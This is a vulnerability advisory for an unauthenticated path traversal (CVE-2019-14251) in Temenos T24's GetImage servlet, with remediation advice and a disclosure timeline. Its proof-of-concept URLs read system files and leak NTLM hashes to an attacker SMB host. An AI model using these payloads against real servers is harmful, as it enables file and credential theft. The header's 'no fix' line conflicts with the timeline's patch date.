Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
###############################################################
#
# Pre-Authenticated Path Traversal in "GetImage" Java servlet (cwe-36)
#
###############################################################
#
# Publication date: to be defined
#
# Author:
# Bourbon Jean-marie (@kmkz_security) - Hacknowledge
# jean-marie@hacknowledge.lu
#
# Product Homepage: https://www.temenos.com/en/solutions/transact/core-banking-software/
# Source code download: N/A
#
# Tested on :
# Version: Build Version R15.01
#
###############################################################
# Pre-Authenticated Path Traversal (cwe-36)
#
# CVSSv3 : 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
# OVE ID: OVE-20190724-0001
# CVE ID: CVE-2019-14251
#
###############################################################
# Fixes:
# No known available fix yet
###############################################################
I. PRODUCT
TEMENOS T24 is the most technically advanced banking system available today.
It combines the most comprehensive and flexible business functionality with the most advanced and scalable architecture.
This gives it unprecedented power to meet the challenges of today and the opportunities of tomorrow.
II. ADVISORY
An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the
T24 web server.
Using this weakness, an attacker might download any file including sensitive containing credential (mgmt-users.properties) or
use it to exfiltrate NTLM hashes using an SMB query to an attacker controlled server in order to compromise it.
III. VULNERABILITY DESCRIPTION
The login page present some juicy JavaScript function that call a servlet used to access some document on the server once successfully authenticated (in theory).
This weakness allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.
As presented below, the "downloadDocServer()" show that the "GetImage" Java servlet use an insecure parameter to download a document a malicious person could use to access file by exploiting a path traversal without
the need to be authenticate within the T24 application.
function downloadDocServer()
{
pdfDownloadPath = escape(unescapeString(""));
pdfDownloadLocation = escape(unescapeString(""));
try
{
// the path used below is vulnerable to CWE-36 (path traversal) vulnerability permitting to extract NTLM hashes or access any file on the server's filesystem
openWindow=window.open('/WealthT24/GetImage?docDownloadPath='+pdfDownloadPath+'&uploadLocation='+pdfDownloadLocation+'','RafPrintWin',type="application/pdf",'toolbar=0,location=0,left=100,top=100,width=800,height=800');
openWindow.focus();
}
catch (e)
{
alert("Either popup blocker is enabled or file cannot be downloaded for viewing at this moment.");
}
}
IV. PROOF OF CONCEPT
a) File accessing: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
b) NTLM hashes extraction: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=\\192.168.19.135\test
V. RECOMMENDATIONS
The application should validate the user input before processing it.
Ideally, the validation should compare against a white-list of permitted values.
If that isn't possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters.
After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path.
It should verify that the canonicalized path starts with the expected base directory.
VI. TIMELINE
July 23th, 2019: Vulnerability identification
July 24th, 2019: First contact with the editor (TEMENOS Team)
July 25th, 2019: CVE attribution
July 29th, 2019: Vulnerability acknowledgement + fix release from Temenos
August 1st, 2019: Patch released to customers
August 12th, 2019: First advisory released
August 19th, 2019: Temenos asked publication removal
September 04th, 2019: Temenos informed that responsible disclosure delay (45 days) will expire next day
December 05th, 2019: Advisory released
VIII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.